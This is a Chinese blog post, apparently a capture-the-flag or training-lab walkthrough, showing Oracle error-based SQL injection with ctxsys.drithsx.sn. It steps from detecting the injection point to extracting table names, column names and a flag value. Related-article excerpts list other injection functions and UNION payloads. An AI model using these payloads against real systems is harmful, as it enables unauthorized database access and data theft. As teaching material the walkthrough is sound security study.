oracle报错注入

最新推荐文章于 2025-05-19 16:30:57 发布
原创 最新推荐文章于 2025-05-19 16:30:57 发布 · 3k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#oracle数据库 #oracle注入 #注入

本文详细介绍了Oracle数据库的报错注入技巧,包括检测注入点、利用特定函数进行数据查询,以及如何通过比较操作符获取多行数据等高级技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

oracle的报错注入的原理和mysql的不一样,但实现的功能是一样的。

使用场景是,1、无法回显的盲注 2.当字段数或类型的原因无法使用union联合查询时

1.查询是否有注入点
对url后面加上mssql的注释 - -,页面异常

后面加上 '- -
在这里插入图片描述
页面显示正常,证明有注入点,并要用’进行闭合

2. 利用函数ctxsys.drithsx.sn 进行报错注入
函数的用法:
1=ctxsys.drithsx.sn(1,(查询语句))

3.查表名
语句是:
and 1=ctxsys.drithsx.sn(1,(select table_name from user_tables where rownum=1 ))
在这里插入图片描述
数据库报错,报错语句中得到了我们想要的ADMIN表
4.查字段名
语句:
and 1=ctxsys.drithsx.sn(1,(select column_name from user_tab_columns where rownum=1))
在这里插入图片描述
第一个字段名是ID,不是我们想要的字段名,oracle又没法像mysql一样用limit,哪还有什么方法可以得到第二行数据呢

5.用<>查看后面的数据
可以用条件: 字段名<>第一行的字段值(就是我们第一次查出来的)
就展示了第二行的数据
语句:and 1=ctxsys.drithsx.sn(1,(select column_name from user_tab_columns where rownum=1 and column_name <>‘ID’))
在这里插入图片描述
第三行
and 1=ctxsys.drithsx.sn(1,(select column_name from user_tab_columns where rownum=1 and column_name <>'ID’and column_name <>‘USER_NAME’))
在这里插入图片描述
第n行
在这里插入图片描述
得到的我们想要的FLAG_FLAG字段
5.查表内的数据
and 1=ctxsys.drithsx.sn(1,(select FLAG_FLAG from ADMIN where rownum=1))
在这里插入图片描述

我们也得到了我们需要的信息:flag为:zkaq{a93fe484c}

Oracle注入——报错注入
希望我的博客,能帮上你解决学习中工作中所遇到的问题
05-20 1884
Oracle注入——报错注入 原理:同MYSQL数据库差不多,但是一些语法不同,相比其他数据库Oracle数据库的数据类型更加严谨,由于过度严谨,所以,我们用显错注入,会比较麻烦,于是,我们利用报错的方法,忽视数据类型,直接获取数据CTXSYS.DRITHSX.SN(user,()) Dual是一个实表(也有人说它是虚表),如果你直接查询它,它只显示一个X,列名为DUMMY 那么要它有什么用妮? 它实际上是为了满足查询语句的结构而产生 比如你想查询你的用户名 select user from Dual
Oracle数据库--报错注入
Y22Lee的博客
04-01 1503
SQL报错注入就是利用数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中。dual 是Oracle库中特有的一个单行单列的虚拟表,Oracle中的一个实际存在的表,任何用户均可读取,常用在没有目标表的Select语句块中。Oracle中弱化了库的概念,用户被强化,即:通俗的讲一个用户一个库。利用子查询和别名,将数据的编号固定住,这样修改r的值即可取出对应的第几条数据。r=1取第一条数据,r=2取第二条数据。利用子查询和别名,将数据的编号固定住,这样修改r的值即可取出对应的第几条数据。
WEB安全--SQL注入--Oracle注入
最新发布
m0_74800552的博客
05-19 568
Oracle注入基础知识
Oracle -- 报错注入
qq_68233961的博客
08-21 1024
Oracle -- 报错注入
19、注入篇--报错注入Oracle
WX公众号-小白学安全
04-10 1170
Oracle概述 1、Oracle数据库属于甲骨文公司,关系型数据库管理系统,数据库 2、讲究语法严谨 select 字段名 from 表名 3、dual表—>虚表 专门用于满足数据库语句结构的表 大部分数据库是数据敏感大小写,语句是不敏感大小写 4、Oracle系统自带表: 没有库的概念,只有用户的概念 查询出所有的表: select from all_tables 查询用户所创建的表:select from user_tables 查询所有的字段:select from all_tab_colum
Oracle-报错注入
weixin_45634365的博客
03-05 606
一、Oracle数据库简介 Oracle数据库系统,是美国ORACLE公司(甲骨文)提供的以分布式数据库为核心的一组软件产品,是一种关系数据库数据库体量较大,一般与jsp网站联合。 常见的数据库:MySQL、MSSQL、Access、Oracle Oracle使用免费,但如果使用中的数据库遇到了问题,例如数据丢失、数据库打不开等等,想要解决问题,就必须寻找Oracle官方的服务,而服务价格不菲,而这就是Oracle的盈利方式。 Oracle比MySQL、MSSQL、Access更为先进,对大数据的处理能力
Oracle报错注入靶场
weixin_45540609的博客
04-23 727
存在5个字段 union select null,null,null,null from dual union select 1,null,null,100 from dual union select 1,to_nchar('aaa'),to_nchar('bbb'),100 from dua l union select 1,to_nchar(table_name),to_nchar('bbb'),null from user_tables 表名admin ...
五、数据库注入(5)Oracle报错注入
weixin_45540609的博客
04-21 383
Oracle简介 Oracle是三大数据库之一,适合处理大量数据,许多国企,银行,大型企业都在使用。 Oracle语法严谨,需要严格遵循select 字段 from 表名 eg:在MYSQL中可以使用select database()来查询数据库名,但在Oracle中需要写成select database() from 表的结构 Oracle中有一个表Dual,是一个专门用来满足数据库语句结构的表。 如果想查询用户名:select user from Dual 调用系统函数获得随机值:se.
80.网络安全渗透测试—[SQL注入篇19]—[Oracle+JSP-9种报错注入]
qwsn
01-20 3072
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、Oracle+JSP 报错注入:`9种` 1、utl_inaddr.get_host_name()进行报错注入 2、ctxsys.drithsx.sn()进行报错注入 3、XMLType()进行报错注入 4、dbms_xdb_version.checkin()进行报错注入 5、bms_xdb_version.makeversioned()进报错注入 6、dbms_xdb_version.uncheckout()进行报
Oracle爆错手工注入.doc
04-05
手工注入方式,利用报错注入 Oracle
Oracle——显错注入报错注入
Mr.Huang_的博客
09-11 290
一、注入函数解析 数据库语言大同小异 oracle 甲骨文公司 使用免费的数据库 服务收费 http://59.63.200.79:8808/index_x.php 这个网址提供了,Oracle数据库接口,我们就可以直接用这个,而不用自己搭建了。 dual这个是一个虚表,是不存在的,是为了专门满足格式而存在的一个表。 Oracle 很死板 非常讲究语法格式 因为你Oracle不像mysql一样,后面不加表也行,他是必须加个表名满足格式,但是为了方便就提供了dual这个表。
oracle——显错注入报错注入
qq_45300786的博客
08-14 911
http://59.63.200.79:8808/index_x.php 这个网址提供了,Oracle数据库接口,我们就可以直接用这个,而不用自己搭建了。 dual这个是一个虚表,是不存在的,是为了专门满足格式而存在的一个表。 因为你Oracle不像mysql一样,后面不加表也行,他是必须加个表名满足格式,但是为了方便就提供了dual这个表。 Oracle弱化了库的概念,强化了用户的概念。就是说把库换成了用户来查询数据。 oracle里面有多个条数据,他就排序多少个rownum,有点像mysql里的i
Oracle注入--报错注入
weixin_52351575的博客
10-02 996
一般大公司用的多,很贵,环境搭建复杂且大,数据库死板,非常讲究语法格式,区分大小写,数据类型很多。dual虚表,专门用来满足oracle数据库严格的语法格式,为凑格式所存在。一般数据库强调库、表名、字段、内容,但Oracle数据库种库被弱化,用户被强化,一个用户代表一个库。
Oracle数据库中的“limit”查询
qq_58000413的博客
07-07 5686
注意:仅用于技术讨论,切勿用于其他用途,一切后果与本人无关。都知道limit函数适用于mysql数据库,在Oracle数据库中无法使用,当需要使用到分页查询时,我们可以用其他的方法进行代替。Oracle数据库中区分单双引号方法一:不等于法(通用法)select * from user_tab_columns where table_name='ADMIN' and rownum = 1 and column_name'UNAME'使用不等于号进行取反,这里的rownum=1输出的是一行,想输出两行可ro..
学习记录-Oracle显错注入报错注入(手工注入)
SmileAndFun的博客
08-17 704
学习记录-Oracle显错注入报错注入(手工注入) 注:文章仅用于学术交流,不用于其他用途,不足之处,大佬评论指出 一、基础知识(学习Oracle报错注入和显错注入前需要掌握) 1)Oracle数据库dual表是一个虚表,为了符合Oracle的语法标准,与access数据库有少许相似,如select null,null from dual 2)Oracle有自带库可以查询到对应的表名及字段,all_tables 查询所有表,user_tables查看当前用户所有表,all_tab_columns查看所有字
【学习笔记】Oracle报错注入
chualam的博客
11-17 310
||utl_inaddr. get_host_name id=1||utl_inaddr. get_host_name((select banner from v$version where rownum=1)) 爆数据库版本 id=1||utl_inaddr. get_host_name((select owner from all_tables where rownum=1)) 爆库名 id=1||utl_inaddr. get_host_name((select owner from all_tabl
oracle注入报错500
05-26
Oracle注入报错500一般表示服务器端出现了内部错误,可能与注入攻击有关,但也可能是其他原因导致的。要解决此问题,可以尝试以下步骤: 1. 检查注入语句是否正确,是否存在语法错误或拼写错误等问题。 2. 检查注入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值